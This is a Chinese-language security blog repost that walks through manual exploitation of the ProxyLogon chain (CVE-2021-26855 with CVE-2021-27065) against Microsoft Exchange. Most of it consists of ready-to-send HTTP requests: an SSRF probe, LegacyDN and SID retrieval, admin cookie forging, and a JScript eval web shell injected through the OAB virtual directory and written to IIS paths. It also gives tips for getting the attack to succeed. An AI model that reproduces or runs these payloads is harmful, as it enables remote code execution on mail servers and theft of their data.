ProxyLogon__手工复现__附POC/EXP,ExChange组合攻击。

admin 2024年11月6日23:03:26评论10 views字数 5683阅读18分56秒阅读模式

ProxyLogon__手工复现__附POC/EXP,ExChange组合攻击。

看了觉得好点个关注咯,欢迎各位师傅加群交流。

勿要非法渗透,造成影响与本人无关!

勿要非法渗透,造成影响与本人无关!

漏洞介绍:

CVE-2021-26855漏洞又称为ProxyLogon,攻击者可以利用ssrf绕过权限验证,再结合同期Exchange的其他漏洞例如文件写入(CVE-2021-27065)等漏洞进行组合RCE。

影响版本:

Exchange Server 2019 < 15.02.0792.010Exchange Server 2019 < 15.02.0721.013Exchange Server 2016 < 15.01.2106.013Exchange Server 2013 < 15.00.1497.012

POC:

响应包头部包含X-CalculatedBETarget、X-FEServer两个字段,表示存在漏洞。

GET /ecp/fd45e2.png HTTP/1.1Host: xx.xxxCookie: X-BEResource=localhost~1942062522;

ProxyLogon__手工复现__附POC/EXP,ExChange组合攻击。

漏洞复现:

1、获取LegacyDN

面这两种方式可以获取目标的域名,还有其它的

(1)这个POC也可获取域名:

https://domain/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%3[email protected]

(2)

ProxyShell第一步这种方式也可以获取LegacyDN

YongYe安全,公众号:YongYe 安全实验室ProxyShell__详细手工复现,CVE组合攻击ExChange_GetShell。全网最详细复现!

知道域名,获取LegacyDN。还有其它方式获取LegacyDN。

POST /ecp/333.js HTTP/1.1Cookie: X-BEResource=域名.local/autodiscover/autodiscover.xml?a=~1942062522;Content-Type: text/xmlContent-Length: 377    <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">        <Request>          <EMailAddress>[email protected]</EMailAddress>          <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>        </Request>    </Autodiscover> 

ProxyLogon__手工复现__附POC/EXP,ExChange组合攻击。

下面这个响应码在整个流程中表示域名存在问题,检查域名。

HTTP/2 500 Internal Server ErrorCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0Request-Id: 63726196-d769-487e-b447-c7X-Calculatedbetarget: rexxx.localX-Aspnet-Version: 4.0.30319X-Powered-By: ASP.NETX-Feserver: VS3Date: Thu, 15 Jun 2023 02:36:01 GMTContent-Length: 88NegotiateSecurityContext failed with for host 'rexxxx.local' with status 'TargetUnknown'

Tips:/ecp/后面随便写都可以,获取不了可换一种方式获取LegacyDN不必死磕。

2、获取SID

POST /ecp/333.js HTTP/2Cookie: X-BEResource=administrator@域名:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;Content-Type: application/mapi-httpX-Requesttype: ConnectX-Clientinfo: {2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}X-Clientapplication: Outlook/15.0.4815.1002X-Requestid: {E2EA6C1C-E61B-49E9-9CFB-38184F907552}:2Content-Length: 147legacyDnx00x00x00x00x00xe4x04x00x00x09x04x00x00x09x04x00x00x00x00x00x00

ProxyLogon__手工复现__附POC/EXP,ExChange组合攻击。

Tips:

(1)注意COOKIE内的端口444,不加获取不了。

(2)Data数据看不懂怎么提交的去看Proxyshell那篇。

3、获取Cookie

POST /ecp/333.js HTTP/2Host: Cookie: [email protected]:444/ecp/proxyLogon.ecp?a=~1942062522;Content-Type: text/xmlMsexchlogonmailbox: S-1-5-20Content-Length: 93<r at="NTLM" ln="Administrator"><s t="0">SID</s></r>

ProxyLogon__手工复现__附POC/EXP,ExChange组合攻击。

4、写入Shell,分为三步。

(1)通过DDI组件Getlist接口获取RawIdentity(GetObject接口有时候返回NULL)

这里参考了G3et师傅这篇文章

G3et,公众号:Hack PartyExchange Proxylogon漏洞复现||附批量扫描POC
POST /ecp/333.js HTTP/2Host: Cookie: X-BEResource=administrator@XXXX:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary=tQInySwhZ0-Jg2pk-I-a2VU41ITRbttmRNRJjxpBKw1pOyT_sPDikSeu50Q.&a=~1942062522; ASP.NET_SessionId=8ae71da5-f5-ab9-bf-5a5c822e3c96; msExchEcpCanary=tQInySwhZ0-Jg2pk-I-a2VU41ITRbt5pVtmRNRJjxpBKw1pOyT_sPDikSeu50Q.Content-Type: application/json; Msexchlogonmailbox: S-1-5-20Content-Length: 247{"filter": {                              "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",                                              "SelectedView": "", "SelectedVDirType": "OAB"}}, "sort": {}}

ProxyLogon__手工复现__附POC/EXP,ExChange组合攻击。

Tips:响应码500、411需要自已研究一下,这里没有深入了解。

(2)利用外部URL虚拟路径属性引入WebShell。

ExternalUrl字段为Shell。

POST /ecp/333.js HTTP/2Host: Cookie: X-BEResource=administrator@XXXX:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=tQInySwhZ0-Jg2pk-I-NvPqeCJS5pVtmRNRJjxpBKw1pOyT_sPDikSeu50Q.&a=~1942062522; ASP.NET_SessionId=e71da5-f5-b9-b3bf-5a5c822e3c96; msExchEcpCanary=tQInySwhZ0-Jg2pk-I-sINiqzvPqeCJS5pVtmRNRJjxpBKw1pOyT_sPDikSeu50Q.Content-Type: application/json; Msexchlogonmailbox: S-1-5-20Content-Length: 481{  "identity": {      "__type": "Identity:ECP",      "DisplayName": "OAB (Default Web Site)",      "RawIdentity": "670ab7cf-e053-4baa-9182-e5f"  },  "properties": {      "Parameters": {          "__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",          "ExternalUrl": "http://ffff/#<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["PASSWORD"],"unsafe");}</script> "      }  }}

ProxyLogon__手工复现__附POC/EXP,ExChange组合攻击。

(3)触发重置时的备份功能,将文件写入指定的UNC目录。

这几个路径都可以写。

127.0.0.1c$inetpubwwwrootaspnet_client1.aspx127.0.0.1c$Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth1.aspx127.0.0.1c$Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthCurrent1.aspx127.0.0.1c$Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthCurrentscripts1.aspx127.0.0.1c$Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthCurrentscriptspremium1.aspx127.0.0.1c$Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthCurrentthemes1.aspx127.0.0.1c$Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthCurrentthemesresources1.aspx
POST /ecp/333.js HTTP/2Host: Cookie: X-BEResource=Administrator@xxxxx:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=MYU5tQGg_Uy9sNsEvjDxaif2q77cbtsINjWbeLtVJFrNVJ0IXoxcaBVSN6mJgLZSU8LWmSAYOqc.&a=~1942062522; ASP.NET_SessionId=12d39774-f175-48cd-8a49-e5a077a1763b; msExchEcpCanary=MYU5tQGg_Uy9sNsEvjDxaif2q77cbtsINjWbeLtVJFrNVJ0IXoxcaBVSN6mJgLZSU8LWmSAYOqc.Content-Type: application/json; charset=utf-8Msexchlogonmailbox: S-1-5-21Content-Length: 330{"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": "25b3d2be-6a28-44d8-acd8-6e2"}, "properties": {"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": "\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\usacd.txt"}}}

ProxyLogon__手工复现__附POC/EXP,ExChange组合攻击。

Tips:

1、WebShell的内容需要规避会被URL编码的特殊字符,且字符长度不能超过255

2、实际利用目标环境问题导致失败比较多。

原理这篇文章分析的很详细,可参考排错:https://hosch3n.github.io/2021/08/22/ProxyLogon%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

漏洞复盘:

1、 通过SSRF获取LegacyDN、SID

2、然后通过SID,获取cookie

4、通过cookie,对OABVirtualDirectory对象进行恶意操作,写入shell

​​

​​

原文始发于微信公众号(YongYe 安全实验室):ProxyLogon__手工复现__附POC/EXP,ExChange组合攻击。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月6日23:03:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ProxyLogon__手工复现__附POC/EXP,ExChange组合攻击。https://cn-sec.com/archives/1844767.html

发表评论

匿名网友 填写信息